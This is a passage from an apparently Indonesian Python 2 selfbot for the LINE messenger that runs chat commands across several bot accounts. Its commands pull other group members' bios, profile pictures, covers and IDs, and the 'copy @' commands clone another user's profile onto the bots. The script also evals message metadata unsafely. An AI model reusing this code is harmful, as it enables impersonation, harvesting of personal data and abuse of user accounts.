elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#------------------------_--------------------------------------
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif msg.text in ["Creator"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Creator Saya ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-jp" in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-jp ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'jp')
cl.sendText(msg.to,trs)
print '[Command] Translate jp'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-th " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-th ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate th'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
elif msg.text in ["Settings","Set"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs up Har Har")
kk.sendText(msg.to,"PONG double thumbs up Har Har")
kc.sendText(msg.to,"PONG double thumbs up Har Har")
ks.sendText(msg.to,"PONG double thumbs up Har Har")
kt.sendText(msg.to,"PONG double thumbs up Har Har")
cl.sendText(msg.to,"PONG double thumbs up Har Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#-------------------------------------------------------
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
#===========================================
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + " "
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + " "
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + " "
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + " "
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + " "
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + ""
kt.sendText(msg.to, text)
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy1 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy1 @","")
_nametarget = _name.rstrip(' ')
gs = kk.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kk.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kk.CloneContactProfile(target)
kk.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy2 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy2 @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy3 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy3 @","")
_nametarget = _name.rstrip(' ')
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kc.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kc.CloneContactProfile(target)
kc.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy4 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy4 @","")
_nametarget = _name.rstrip(' ')
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ks.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ks.CloneContactProfile(target)
ks.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif "copy5 @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("copy5 @","")
_nametarget = _name.rstrip(' ')
gs = kt.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kt.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kt.CloneContactProfile(target)
kt.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
kt.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali ke asli"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
kt.updateDisplayPicture(backup.pictureStatus)
kt.updateProfile(backup)
cl.sendText(msg.to, "Backup Astro Sukses")
except Exception as e:
